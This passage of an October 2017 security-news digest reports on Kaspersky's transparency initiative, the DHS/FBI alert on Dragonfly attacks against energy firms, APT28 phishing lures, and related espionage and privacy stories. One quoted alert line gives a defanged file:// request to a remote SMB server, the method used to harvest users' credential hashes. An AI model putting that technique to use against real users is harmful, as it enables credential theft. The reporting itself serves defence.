However, the offer did not stop U.S. Department of Homeland Security (DHS) from banning and removing Kaspersky software from all of the government computers.
In a blog post today the company published a four-point plan:
Kaspersky will submit its source code for independent review by internationally recognised authorities, starting in Q1 2018.
Kaspersky also announced an independent review of its business practices to assure the integrity of its solutions and internal processes.
Kaspersky will establish three transparency centres in the next three years, "enabling clients, government bodies & concerned organisations to review source code, update code and threat detection rules."
Kaspersky will pay up to $100,000 in bug bounty rewards for finding and reporting vulnerabilities in its products.
"With these actions, we will be able to overcome mistrust and support our commitment to protecting people in any country on our planet," Kaspersky's CEO Eugene Kaspersky said.
However, infosec experts' twitter commentary shows that the damage has already been done.
"Code review is absolutely meaningless. All Russian intelligence need is an access to KSN, Kaspersky's data lake which is a treasure trove of data. Even open sourcing the entire product won't reveal or even help with revealing that." Amit Serper, the security researcher at Cybereason, tweeted.
Now it is important to see whether these actions will be enough to restore the confidence of US government agencies in Kaspersky or the company will be forced to move its base out of Russia.


DHS, FBI Warn of Ongoing APT Attack Against Critical Infrastructure
24.10.2017 securityweek BigBrothers
The Department of Homeland Security and Federal Bureau of Investigation have issued a joint technical alert warning that government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors are subject to an ongoing attack campaign from an advanced actor, most probably Dragonfly (aka Crouching Yeti and Energetic Bear).

The alert was first distributed by email and is now published by US-CERT. It warns, “Since at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical manufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims' networks.” The attack is considered to be ongoing.

The alert does not itself attribute the attack to any specific attacker, but it does comment, “The report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign.” Dragonfly's activities against western critical infrastructure -- and especially the energy sector -- have been known for many years. There have been many suggestions that the group operates out of Russia and may be connected to the Russian government.

This new alert from DHS/FBI would therefore suggest either an increase in tempo or growing success in Dragonfly's activities. It describes the attacks in relation to the seven-stage kill chain; but noticeably stops short of the final stage, 'actions on objective'. The implication is that the attacker is seeking a position for possible action against the critical infrastructure in the future.

The threat actors have chosen their targets rather than attacking targets of opportunity. Typically, this is followed by a spear-phishing campaign using email attachments to leverage Microsoft Office functions to retrieve a document using the Server Message Block (SMB) protocol. This sends the user's credential hash to the remote server, where “The threat actors then likely used password-cracking techniques to obtain the plaintext password. Once actors obtain valid credentials, they are able to masquerade as authorized users.”

Watering holes are also used to gather credentials. “The threat actors compromise the infrastructure of trusted organizations to reach intended targets,” notes the alert, adding, “Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure.”

When credentials have been gained, the attackers use these to access victims' networks where multi-factor authentication is not in use. Once inside the networks, the attackers download their tools from a remote server. In one example, the attacker downloaded multiple files, including INST.txt. This was renamed to INST.exe, run, and immediately deleted. “The execution of INST.exe,” says the alert, “triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of a compromised system of an intended target.” In its earlier report, Symantec associated the MD5 hash of INST.exe to Backdoor.Goodor.

There is no direct indication in this report that critical infrastructure operation technology (OT) networks have been compromised -- but it does state clearly that the IT networks have been breached. “This APT actor's campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.”

The primary activity on the compromised networks seems to be reconnaissance, presumably to find OT weaknesses that could be exploited on demand. “Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. Specifically, the threat actors focused on identifying and browsing file servers within the intended victim's network. The threat actors viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.”

The report adds, “In one instance, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. In this same incident, the threat actors created a malicious scheduled task that invoked ‘scr.exe’ with the arguments ‘scr.jpg’. The MD5 hash of scr.exe matched the MD5 of ScreenUtil, a tool used by the threat actor, as reported in the Symantec Dragonfly 2.0 report.”

“The latest U.S. power company attacks,” warns David Zahn, GM at PAS, “are an escalation that should be a wakeup call for all critical infrastructure companies that we need to do more. Even basics like knowing what cyber assets are in a power plant or industrial facility are missing today. If you cannot see it, you cannot secure it. If you cannot secure it, then understand that it may get worse before it gets better. Additional attention and investment are needed if we are to get ahead of these threats.”

The US-CERT alert comes with a long list of network signatures and host-based rules that can be used to detect malicious activity associated with the threat actors' TTPs. Both the DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided, and add the IPs to their watch list to determine whether malicious activity is occurring within their organization.


Kaspersky Aims to Clear Its Name With New Transparency Initiative
24.10.2017 securityweek  BigBrothers
Kaspersky Lab announced on Monday the launch of a new Global Transparency Initiative whose goal is to help the company clear its name following recent reports about its inappropriate ties to the Russian government.

There have been several media reports analyzing the company’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of Kaspersky products. It all culminated last month when the Department of Homeland Security (DHS) ordered all government agencies to identify and remove the firm’s security products.

The latest report on Kaspersky’s ties with Russia came from the Wall Street Journal, which claimed that Russian hackers had exploited Kaspersky software to steal NSA exploits. The news article did not provide too many details, but the main possible scenarios were that either Kaspersky colluded with the Russian government or that the hackers exploited vulnerabilities in the company’s products to access the NSA exploits.

Kaspersky has always denied any wrongdoing and it has often offered to allow governments to take a look at its source code to prove it. The company’s latest attempt to clear its reputation is the Global Transparency Initiative.

The first phase of the initiative includes an independent source code review that will be conducted by the first quarter of 2018. At a later time, the company’s software updates and threat detection rules will also be put under the microscope.

By Q1 2018, Kaspersky also wants an independent assessment of its secure development lifecycle processes, and its software and supply chain risk mitigation strategies. The firm has also proposed the development of additional controls to manage its data processing practices and confirmation of compliance with said controls by an independent party.

In order to give its partners – including government stakeholders – access to source code and other product components, Kaspersky plans on establishing three Transparency Centers in Asia, Europe and the United States. While the deadline for the three centers is 2020, the company wants to launch the first one next year.

Likely in response to the latest news report, which suggests that hackers may have stolen NSA files by exploiting a vulnerability in Kaspersky products, the security firm has promised to offer as much as $100,000 for severe vulnerabilities found in its products. The company currently offers $5,000 for serious flaws and wants to introduce the new maximum reward by the end of the year.

“Internet balkanization benefits no one except cybercriminals,” said Eugene Kaspersky, chairman and CEO of Kaspersky Lab. “Reduced cooperation among countries helps the bad guys in their operations, and public-private partnerships don’t work like they should. The internet was created to unite people and share knowledge.”

“Cybersecurity has no borders, but attempts to introduce national boundaries in cyberspace is counterproductive and must be stopped. We need to reestablish trust in relationships between companies, governments and citizens,” he added. “That’s why we’re launching this Global Transparency Initiative: we want to show how we’re completely open and transparent. We’ve nothing to hide. And I believe that with these actions we’ll be able to overcome mistrust and support our commitment to protecting people in any country on our planet.”

Eugene Kaspersky has been invited by the U.S. House of Representatives’ Oversight Subcommittee of the Committee on Science, Space, and Technology to testify and respond to the accusations brought against his company. However, the hearing was initially scheduled too soon, which did not give him enough time to obtain a U.S. visa. The hearing will be rescheduled for a later date, Kaspersky said on Twitter.


Russian Spies Lure Targets With NATO Cybersecurity Conference
24.10.2017 securityweek  BigBrothers
A cyber espionage group linked to Russia has been trying to deliver malware to targeted individuals using documents referencing a NATO cybersecurity conference, Cisco’s Talos research team reported on Monday.

The attack has been linked to the notorious threat actor known as APT28, Pawn Storm, Fancy Bear, Sofacy, Group 74, Sednit, Tsar Team and Strontium.

The campaign was apparently aimed at individuals interested in the CyCon U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) in collaboration with the Army Cyber Institute at West Point on November 7-8 in Washington, D.C. The hackers created malicious documents with information that was copied from the official CyCon U.S. website.

The topic used as bait in this attack suggests that the threat actor targeted individuals with an interest in cyber security.

APT28 has been known to use zero-day exploits in its operations and, earlier this month, researchers noticed that the hackers had started leveraging a Flash Player vulnerability that Adobe had patched just two days prior. However, in the campaign analyzed by Cisco Talos, the attackers did not use any zero-days.

Instead, they relied on Office documents containing a VBA script. The goal was to deliver Seduploader, a piece of malware which has been used by the threat actor in other NATO-related attacks as well.

“In the previous campaign where adversaries used Office document exploits as an infection vector, the payload was executed in the Office word process. In this campaign, adversaries did not use any exploit. Instead, the payload is executed in standalone mode by rundll32.exe,” researchers explained.

Seduploader is a reconnaissance malware capable of capturing screenshots, collecting and exfiltrating information about the system, executing code, and downloading files. The variant used in these attacks is slightly different compared to previously known samples, which is likely an attempt to evade detection.

The CCDCOE published an alert on its website on Monday to warn people interested in the CyCon conference about the attack.

“This is clearly an attempt to exploit the credibility of Army Cyber Institute and NATO CCDCOE in order to target high-ranking officials and experts of cyber security,” the organization said.

APT28 is not the only threat actor to use cyber security conferences as a lure in their operations. Last year, Palo Alto Networks reported that a China-linked espionage group known as Lotus Blossom, Elise and Esile had used fake invitations to the company’s Cybersecurity Summit to trick users into installing malware.


Assemblyline – Canada’s CSE intelligence Agency releases its malware analysis tool
23.10.2017 securityaffairs BigBrothers

Canada’s Communications Security Establishment (CSE) intel agency has released the source code for one of its malware analysis tools dubbed Assemblyline.
The Canada’s Communications Security Establishment (CSE) intelligence agency has released the source code for one of its malware detection and analysis tools dubbed Assemblyline.

The Assemblyline tool is written in Python and was developed under the CSE’s Cyber Defence program.

“This tool was developed within CSE’s Cyber Defence program to detect and analyse malicious files as they are received. As the Government of Canada’s centre of excellence in cybersecurity, CSE protects and defends the computer networks and electronic information of greatest importance to the Government of Canada,” states the Communications Security Establishment. “Our highly skilled staff works every day to protect Canada and Canadians from the most advanced cyber threats. Assemblyline is one of the tools we use.”


The Canadian intelligence agency described the analysis process as a conveyor belt, the files arrive in the system and are triaged in a sequence composed of the following phases:

Assemblyline generates information about each file and assigns a unique identifier that travels with the file as it flows through the system.
Users can add their own analytics, which we refer to as services, to Assemblyline. The services selected by the user in Assemblyline then analyze the files, looking for an indication of maliciousness and/or extracting features for further analysis.
The system can generate alerts about a malicious file at any point during the analysis and assigns the file a score.
The system can also trigger automated defensive systems to kick in. Malicious indicators generated by the system can be distributed to other defence systems.
Assemblyline recognizes when a file has been previously analysed.
The CSE decided to release the Assemblyline tool so that anyone can customize it and deploy their own analytics into it.

The tool allows users to focus their efforts on the most harmful files, reducing the number of non-malicious files that experts have to inspect.

“The strength of Assemblyline is the ability of users to scale the system to their needs and the way that Assemblyline automatically rebalances its workload depending on the volume of files. It reduces the number of non-malicious files that security analysts have to inspect, and permits users to focus their time and attention on the most harmful files, allowing them to spend time researching new cyber defence techniques,” CSE added.

The Assemblyline source code is available on BitBucket, and users can modify it according to their needs.

Other intelligence agencies have also released open source tools in the past. In November 2016, peers at the GCHQ released the CyberChef tool to analyze encryption, compression and decompression, and data formats.


A leaked document raises doubts about whether the NSA has known of the #Krack attack since 2010
23.10.2017 securityaffairs BigBrothers

A leaked NSA document about the BADDECISION hacking tool raises doubts about whether the National Security Agency has known about the Krack attack since 2010.
Security experts are questioning the NSA about the recently disclosed Krack attack, which allows an attacker to decrypt information carried in protected WPA2 traffic.

Security experts believe that the National Security Agency was aware of the flaw and its arsenal included a specific exploit.

An NSA spokesperson did not comment on the claims, which is normal for US intelligence agencies, but according to ZDNet, rumors that it knew something about the vulnerability in the WPA2 protocol are circulating in the intelligence community.

In some cases, US intelligence agencies that know of a vulnerability do not disclose it, so that they can exploit it in intelligence operations.

According to a top secret document leaked by Edward Snowden and dated 2010, the NSA arsenal included a hacking tool called BADDECISION, classified as an “802.11 CNE tool that used a true Man-in-the-middle attack and frame injection technique to redirect a target client to a FOXACID server.”


The NSA exploit was designed to target wireless networks with a man-in-the-middle attack carried out from within range of the network. According to the Top-Secret slides it works against WPA and WPA2 networks, which implies that BADDECISION could bypass the encryption.

The FOXACID platform allows NSA operators to automatically supply the best malware for a specific target.

The slide said the hacking tool “works for WPA/WPA2,” suggesting that BADDECISION could bypass the encryption.

Cue the conspiracy theories. No wonder some thought the hacking tool was an early NSA-only version of KRACK.

Is BADDECISION the Krack attack tool?

Difficult to say, but many security researchers believe BADDECISION doesn’t exploit the KRACK attack.

According to former NSA staffers cited by ZDNet, the NSA BADDECISION exploit is a sort of Ettercap-like tool that conducts man-in-the-middle attacks to carry out address resolution protocol (ARP) spoofing or poisoning.

Anyway, even if NSA’s BADDECISION doesn’t rely on the Krack attack, it is impossible to rule out that the agency was aware of the recently disclosed vulnerability.


DHS and FBI warn of ongoing attacks on energy firms and critical infrastructure
23.10.2017 securityaffairs BigBrothers

The US DHS and the FBI have issued a warning that APT groups are actively targeting energy firms and critical infrastructure.
The US Department of Homeland Security (DHS) and the FBI have issued a warning that APT groups are actively targeting government departments, and firms working in the energy, nuclear, water, aviation, and critical manufacturing sectors.

The warning was sent to organizations via email on Friday to inform them of advanced persistent threat activity targeting energy and other critical infrastructure sectors since at least May 2017.

“Since at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical manufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims’ networks.” reads the alert.

“Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity. Of specific note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign.”


The hackers target third-party suppliers and contractors (“staging targets”) in order to reach the intended institutions.

The attackers leverage the staging targets’ networks as pivot points and malware repositories when launching the attacks on their final intended victims.

According to the warning, the campaign is still ongoing, and government experts believe it is operated by the Dragonfly hacking group (aka Energetic Bear), which has been active since at least 2011, when it targeted defense and aviation companies in the US and Canada. Only in a second phase, in early 2013, did Dragonfly focus its efforts on US and European energy firms.

In 2014, security experts at Symantec uncovered a new campaign targeting organizations located in the US, Italy, France, Spain, Germany, Turkey, and Poland.

The Dragonfly gang conducted a cyber espionage campaign against energy grid operators, major electricity generation firms, petroleum pipeline operators, and energy industry industrial equipment providers.

According to the JAR report published by the US Department of Homeland Security, Dragonfly is a Russian APT actor linked to the government.

The infamous group had remained under the radar since December 2015, but researchers have now pointed out that Dragonfly has targeted energy companies in Europe and the US.

In September 2017, the attackers aimed to control or even sabotage operational systems at energy facilities.

Back to the ongoing campaign, the attackers launched a spear-phishing campaign.

“Throughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server prior to retrieving the requested file.” states the alert. “(Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors then likely used password-cracking techniques to obtain the plaintext password. Once actors obtain valid credentials, they are able to masquerade as authorized users.”

APT28 hackers also used spear-phishing emails carrying a generic contract agreement in the form of a PDF which, even though it contains no malicious code, prompts the victim to click a link that (via a shortened URL) downloads a malicious file.

The weaponized attachments may pose as legitimate curricula vitae (CVs) or résumés for industrial control systems personnel, or as invitations or policy documents, designed to entice users into clicking on the attachment.

“The emails leveraged malicious Microsoft Word attachments that appear to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, as well as invitations and policy documents that entice the user to open the attachment. The list of file names has been published in the IOC.” continues the alert.

Attackers also used watering hole attacks, compromising trade publications and informational websites related to process control, ICS, or critical infrastructure.

Much more detail, including indicators of compromise, filenames used in the attacks, and MD5 hashes, can be found in the alert published on US-CERT.


Canada's CSE Spy Agency Releases Malware Analysis Tool
20.10.2017 securityweek BigBrothers
Canada’s Communications Security Establishment (CSE) agency announced this week that the source code for one of its malware detection and analysis tools has been made public.

The Python-based tool released as open source by the spy agency is named Assemblyline and it was created within the CSE’s Cyber Defence program. The organization says this is one of the tools it uses to protect the country’s computer systems against advanced cyber threats.

Assemblyline allows defenders to automate the analysis of malicious files. The analysis process, which has been compared to a conveyor belt, involves assigning a unique identifier to files as they travel through the system, looking for signs of malicious functionality and extracting features for further analysis, generating alerts for malicious files and assigning them a score, and sending data to other protection systems so that identified threats can be neutralized.

Users can also add their own analytics, including custom-built software and antiviruses, to enhance Assemblyline’s capabilities.

“The strength of Assemblyline is the ability of users to scale the system to their needs and the way that Assemblyline automatically rebalances its workload depending on the volume of files. It reduces the number of non-malicious files that security analysts have to inspect, and permits users to focus their time and attention on the most harmful files, allowing them to spend time researching new cyber defence techniques,” CSE said.

The Assemblyline source code is available on BitBucket. Organizations can modify it to suit their needs or integrate it into existing solutions.

The CSE is a security and intelligence organization focused on collecting intel in support of the government’s priorities, and protecting the country’s most critical computer networks. While the spy agency has often been described as “super secret,” some insight into its activities was revealed by documents leaked a few years ago by former NSA contractor and whistleblower Edward Snowden.

The documents showed that the CSE had been analyzing a foreign espionage operation that it had linked to French intelligence. The campaign has since been investigated by many researchers and cybersecurity firms.

The CSE is not the only spy agency to release open source tools. Last year, the UK’s Government Communications Headquarters (GCHQ) made available CyberChef, a tool that allows both technical and non-technical people to analyze encryption, compression and decompression, and data formats.


G7 to Put Squeeze on Internet Giants at Terror Talks
20.10.2017 securityweek BigBrothers
Tech giants including Google, Facebook and Twitter will come under pressure in Italy this week to go further and faster in helping G7 powers tackle the ever-greater threat of extremists online.

A two-day meeting of Group of Seven interior ministers, which kicks off on the Italian island of Ischia on Thursday, comes just days after US-backed forces took full control of Raqa in Syria, which had become a byword for atrocities carried out by the Islamic State group.

Despite the breakthrough in the battle against IS, the head of Britain's domestic intelligence service said Tuesday that the UK was facing its most severe terrorist threat ever, particularly due to the spread of jihadist material online.

MI5 head Andrew Parker said attacks could now accelerate rapidly from inception to action, and "this pace, together with the way extremists can exploit safe spaces online, can make threats harder to detect".

In a first for a G7 meeting, representatives from Google, Microsoft, Facebook and Twitter will take part in the talks between the seven ministers from Britain, Canada, France, Germany, Italy, Japan and the United States.

"The internet plays a decisive role in radicalization. Over 80 percent of conversations and radicalisation happen online," said Italy's Marco Minniti, who is hosting the summit on the volcanic island off Naples.

- 'Wake up' -

"We need to study a system for automatically blocking specific content. IS contaminated the web with a 'terror malware'. The providers need to help us block this malware with an automatic antivirus," Minniti said.

"We don't want to impose anything, success will rely on us having a collaborative spirit," he added.

In June, Facebook, Microsoft, Twitter and YouTube announced the launch of an anti-terror partnership, the "Global Internet Forum to Counter Terrorism", aimed at thwarting the spread of extremist content online.

Facebook has launched campaigns in Belgium, Britain, France and Germany to develop "best practices".

And in September, Twitter touted victories in the battle against tweets promoting extremist violence, saying it has been vanquishing those kinds of accounts before governments even ask.

But last month top Western counter-terror chiefs said they need more support from social media companies to detect potential threats, particularly with jihadist attacks increasingly being carried out by home-grown "lone wolves".

Tough privacy laws and protections enjoyed by the largely US-based web giants are impeding authorities, they said.

Some firms are using software aimed at helping them quickly find and eliminate extremist content, developed by Dartmouth College computer science professor Hany Farid, a senior advisor to the US Counter Extremism Project.

But Farid told AFP it was unclear how broadly it was being deployed and urged the G7 to "give serious consideration to legislative relief" if the tech giants fail to "wake up and respond more aggressively" to abuses of their systems.

- Dark web vs 'likes' -

While some warn terror online will be difficult to conquer, with extremists simply moving onto the dark web, Italian expert Marco Lombardi said jihadists would not readily give up the mass-audience potential of social media.

Opportunities for "conversion, propaganda and dissemination" lie "on sites capable of influencing thousands of youngsters with a few 'likes'," said Lombardi, director of the research centre ITSTIME (Italian Team for Security, Terrorist Issues & Managing Emergencies).

The British government has outlined an internet safety strategy with proposals it will likely share with fellow G7 members, including an attempt to persuade leading web players to pay for measures to combat dangers.

While Germany has focused particularly on defending itself from cyber attacks, it launched the ZITis surveillance agency last month, which will specialise in "digital forensics" as part of its strategy to fight terrorism.

For its part, despite being labelled an enemy by IS, Japan has escaped attacks to date. Nevertheless, in June its lawmakers passed a controversial bill allowing authorities to target terror conspiracies.


Australia Spy Chief Warns of Growing Foreign Meddling
19.10.2017 securityweek BigBrothers
Foreign powers are waging an "extensive, unrelenting" campaign of espionage and meddling in Australia, notably targeting ethnic and religious minorities, the country's spy chief warned Thursday.

The Australian Security Intelligence Organisation (ASIO) said it was struggling to cope with the threat, with its resources stretched from fighting terrorism.

Spy chief Duncan Lewis said in a foreword to ASIO's annual report that over the past year there had been a "steadily worsening overall security and operational environment".

He pinpointed heightened terror fears, but also growing foreign interference which was "extensive, unrelenting and increasingly sophisticated".

Overseas powers had sought classified information on Australia's alliances and partnerships, its position on diplomatic, economic and military issues, energy and mineral resources, and innovations in science and technology, he said.

"Espionage and foreign interference is an insidious threat -- activities that may appear relatively harmless today can have significant future consequences," he warned.

Officials last week revealed sensitive data about Australia's F-35 stealth fighter and P-8 surveillance aircraft programmes was stolen when a defence subcontractor was hacked using a tool widely used by Chinese cyber criminals.

Without naming any countries, Lewis pointed to "a number of states and other actors".

"Our investigations revealed countries undertaking intelligence operations to access sensitive Australian government and industry information," he said.

"We identified foreign powers clandestinely seeking to shape the opinions of members of the Australian public, media organisations and government officials in order to advance their country's own political objectives.

"Ethnic and religious communities in Australia were also the subject of covert influence operations designed to diminish their criticism of foreign governments," Lewis added.

He said the activities represented "a threat to our sovereignty, the integrity of our national institutions and the exercise of our citizens' rights".

The report comes after recent public warnings from Australian officials about the level of Chinese government interference on university campuses.

There are mounting concerns about the way Beijing uses nationalist student groups to monitor Chinese students, and challenge academics whose views do not align with Communist Party doctrine, particularly over issues such as Taiwan and border disputes.

Foreign Minister Julie Bishop stressed this week international students were welcome but Australia was a democracy and "we don't want to see freedom of speech curbed in any way involving foreign students or foreign academics".

According to state broadcaster ABC, Beijing's intrusion into Western universities has sparked a push by Australia's closest allies, including the US, Britain, Canada and New Zealand, for a more coordinated response to the tactics.

While foreign meddling was a major concern for ASIO, so was the heightened terror threat which was placing "considerable pressure" on the domestic spy agency.

Its report said three planned attacks in Australia were disrupted over the past 12 months, while highlighting concern about the growing influence of Islamic State in Southeast Asia.


Trump Team 'Dispels' EU Doubts on Data Protection Deal
19.10.2017 securityweek BigBrothers
US President Donald Trump's administration has "dispelled" doubts over whether it will stand by a hard-won personal data protection accord with Europe struck during Barack Obama's presidency, the EU said Wednesday.

But Brussels said it still wanted Washington to improve on a deal to protect European personal data transferred to the US by internet giants like Google and Facebook.

Last year's deal replaced a previous arrangement struck down by the bloc's top court, leaving the big companies unsure whether they could transfer data without facing a legal challenge.

However, Trump's "America first" policy, which has caused him to back out of agreements sealed by Obama, had raised European Union concerns.

"I can say that my second visit dispelled my doubts whether 'America First' does not mean 'America only'," EU Justice Commissioner Vera Jourova said at a press conference in Brussels.

Jourova said US Commerce Secretary Wilbur Ross and his team, whom she met last month in Washington, "have been very clear about their commitment to the privacy shield."

"And I got the feeling they understood the concerns Europeans have about the transfer of their personal data."

But she acknowledged there was "still some differences" between the two sides over the balance to strike between protecting privacy and ensuring security.

The European Commission, the executive of the 28-nation EU, said the deal "continues to ensure an adequate level of protection" for personal data transferred to firms in the US.

Jourova said the US, for example, has put in place ways in which EU individuals and firms can seek and obtain redress for complaints they may have with data transfers.

She added that more than 2,400 companies had already been certified by the US Commerce Department to participate in the scheme.

The commission said relevant US safeguards remained in place over access to personal data by US public authorities for national security reasons.

"But we also found space for improvement," Jourova added.

The commission recommended that US authorities do more to monitor whether companies were complying with their obligations under the deal as well as regularly search participating companies that make false claims.

It called for closer cooperation between relevant US authorities and their EU data protection counterparts.

Jourova urged Washington to name "as soon as possible" an ombudsman to tackle complaints from EU citizens, though there was "no concrete deadline".


Supreme Court Will Hear U.S. Vs Microsoft Privacy Case
18.10.2017 securityweek BigBrothers
World Will Watch the U.S. Government Vs Microsoft Played Out in the Supreme Court

The continuing battle between the U.S. government and Microsoft over access to private emails stored in Ireland is going to the Supreme Court. The case was accepted by the Supreme Court on Monday.

It began in 2013 when the government served a search warrant on Microsoft, seeking emails it believed would help in the prosecution of a drugs-trafficking case. Microsoft handed over relevant information stored in America, but declined to deliver emails stored in Ireland. It argued overreach, claiming that a search warrant could only apply within U.S. borders.

The government went to court to force Microsoft to comply. At first its warrant was upheld, but Microsoft appealed and the U.S. Court of Appeals for the 2nd Circuit subsequently overturned the ruling.

The basic arguments are relatively simple. The government contends that an inability to access evidence pertaining to U.S. means that "hundreds if not thousands of investigations of crimes -- ranging from terrorism, to child pornography, to fraud -- are being or will be hampered by the government's inability to obtain electronic evidence." It holds that the warrant is valid because the actual search would be conducted in the U.S.

Microsoft contends that the relevant law, the Stored Communications Act of 1986, was written in an age that had no concept of private emails being stored in different locations across the globe. But it also claims there are wider issues to consider. "If U.S. law enforcement can obtain the emails of foreigners stored outside the United States," wrote Microsoft's president and chief legal officer Brad Smith in a blog post yesterday, "what's to stop the government of another country from getting your emails even though they are located in the United States?"

The current laws were written for the era of the floppy disk, he added, "not the world of the cloud. We believe that rather than arguing over an old law in court, it is time for Congress to act by passing new legislation, such as the International Communications Privacy Act (ICPA) of 2017."

Writing in the Volokh Conspiracy blog yesterday, George Washington University law professor Orin Kerr points out that it is unusual for the Supreme Court to hear a case without a lower-court split. "It's typical for the justices to wait for lower courts to divide on an issue before they will step in," he wrote. "Relying on splits uses lower-court disagreement as a signal for the kind of difficult and important issues that the justices need to resolve." It is, he suggests, "a recognition among the justices of the tremendous importance of digital evidence collection. Whatever the right answers are, the justices need to provide them."

While the drama is being played out on the U.S. legal stage, it is being watched closely around the world -- and no more so than in Europe. Europe has a different attitude towards privacy than the U.S., typified first in the European Data Privacy Directive, and now in the European General Data Protection Regulation (GDPR). Both require that European personal data should not be exported to a location with lower privacy protections than in Europe. The U.S. is considered one such location.

To get round this potential impasse, Europe and the U.S. developed a Safe Harbor arrangement to allow American companies to export European data to servers in America; but this was thrown out by the European Court of Justice (the EU's equivalent to the Supreme Court) in September 2015. The primary reason was unfettered access to personal data by the U.S. government.

Since then the two governments have developed Privacy Shield as a stronger replacement for Safe Harbor -- but Privacy Shield has not yet been tested in the courts. Europe's reaction to the US government's potential ability to unilaterally extract European data from within Europe will test Privacy Shield to the limits.

"In a keenly watched case," summarizes Robert Cattanach, a partner at the international law firm Dorsey & Whitney, "the US Supreme Court has agreed to review a decision by the Second Circuit Court of Appeals that Microsoft did not have to turn over user data stored overseas in response to a search warrant issued under the Stored Communication Act. The case pits the interests of law enforcement access to information against concerns over government overreach, and could have ramifications globally as other nations likely will adapt their policies regarding access to information stored in other countries based on what the US Supreme Court decides. Privacy advocates have decried the prospect of borderless search authority by governments across the world, while law enforcement have painted the specter of criminal activities being shielded by convenient placement of data. All of this is being played out as the European Union continues its review of the Privacy Shield measure that allows the transfer of personal data of EU residents to the US under the presumption that it can be adequately protected."


Russia Fines Telegram For Not Giving Backdoor Access
16.10.2017 securityweek BigBrothers
A Russian court on Monday fined the popular Telegram messenger app for failing to provide the country's security services with encryption keys to read users' messaging data.

The court imposed an 800,000-ruble fine (about $14,000/12,000 euros) over Telegram's failure to "provide law enforcement agencies with information" about its users and their messages, TASS news agency reported.

The free instant messaging app, which lets people exchange messages, photos and videos in groups of up to 5,000 people, has attracted about 100 million users since its launch in 2013.

Telegram's self-exiled Russian founder Pavel Durov said in September the FSB had demanded backdoor access.

When Telegram did not provide the encryption keys, the FSB launched a formal complaint.

According to a scan of the complaint posted online by Durov, the FSB had sent a letter to Telegram in July demanding "information necessary to decode users' sent, received, delivered and processed electronic messages".

The fine is the latest move in an ongoing dispute between Telegram and the Russian authorities as Moscow pushes to increase surveillance of internet activities.

In June, Russia's state communications watchdog threatened to ban the app for failing to provide registration documents. Although Telegram later registered, it stopped short of agreeing to its data storage demands.

Companies on the register must provide the FSB with information on user interactions.

Starting from 2018, they must also keep all data from users in Russia according to controversial anti-terror legislation passed last year which was decried by internet companies and the opposition.

Telegram now has 10 days to appeal Monday's decision. If an appeal fails, the company will be given a grace period to hand over its encryption keys after which it could be blocked in Russia.

Asked about a potential block of the service, Kremlin spokesman Dmitry Peskov said: "As far as I know... there is no discussion of a block at this time."


'Tick' Cyber Espionage Group Linked to China
16.10.2017 securityweek BigBrothers
The cyber espionage group known as Bronze Butler and Tick continues to target Japan using custom-built malware. Evidence found by researchers suggests that the actor is based in China.

The first report on Tick was published in April 2016 by Symantec. However, the security firm pointed out at the time that the threat group had likely been active for at least a decade prior to its activities being discovered.

Tick has been known to use a downloader tracked as Gofarer and a data-stealing Trojan dubbed Daserf. A report published by Palo Alto Networks earlier this year linked the custom-built Daserf malware – based on command and control (C&C) servers – to a threat known as Minzen, XXMM, Wali and ShadowWali.

The first Tick attacks detailed by Symantec focused on technology, aquatic engineering, and broadcasting firms in Japan. Palo Alto Networks reported seeing campaigns aimed at defense and high-tech organizations in Japan and South Korea.

A new report published last week by SecureWorks links Tick to China based on several pieces of evidence. For example, the group uses T-SMB Scan tools created by a Chinese developer, an early version of the Minzen backdoor used Chinese characters in a service name, and there are links between Daserf and the NCPH group, which has been tied to the Chinese military.

Experts also pointed out that Tick activity has typically decreased during Chinese national holidays, and targeting intellectual property and economic intelligence from competing countries is something China has been known to do.

The attacks observed by the security firm were aimed at Japanese organizations in the critical infrastructure, manufacturing, heavy industry and international relations sectors. The hackers have mainly targeted intellectual property related to technology and development, business and sales information, emails and meeting schedules, product specifications, and network and system configuration files.

The report from SecureWorks also provides some information on Datper, a piece of malware used in 2016 and 2017, which experts believe was meant to replace Daserf. XXMM has been used by the threat actor in roughly the same period.

The Tick group has continued to use spear-phishing and watering hole attacks to breach the systems of its targets. However, SecureWorks has also seen attacks involving a zero-day vulnerability affecting a popular Japanese corporate tool.

The zero-day has been used to breach the systems of numerous Japanese organizations, but the hackers only proceeded with further activities in the case of companies that presented an interest. In some cases, the attackers managed to remain undetected within compromised networks for as much as five years.

Once it no longer needs any information from a target, Tick attempts to remove all evidence of its activities on the compromised networks.


Iranian hackers compromised the UK leader Theresa May’s email account along with 9,000 other emails
16.10.2017 securityaffairs BigBrothers

Iranian hackers compromised 9,000 UK emails in ‘brute force’ cyber attack that was initially attributed to Russian state-sponsored hackers.
On June 23, around 9,000 email accounts, including those belonging to Theresa May and other Cabinet Ministers, were hacked in the 12-hour “sustained and determined” cyber attack.

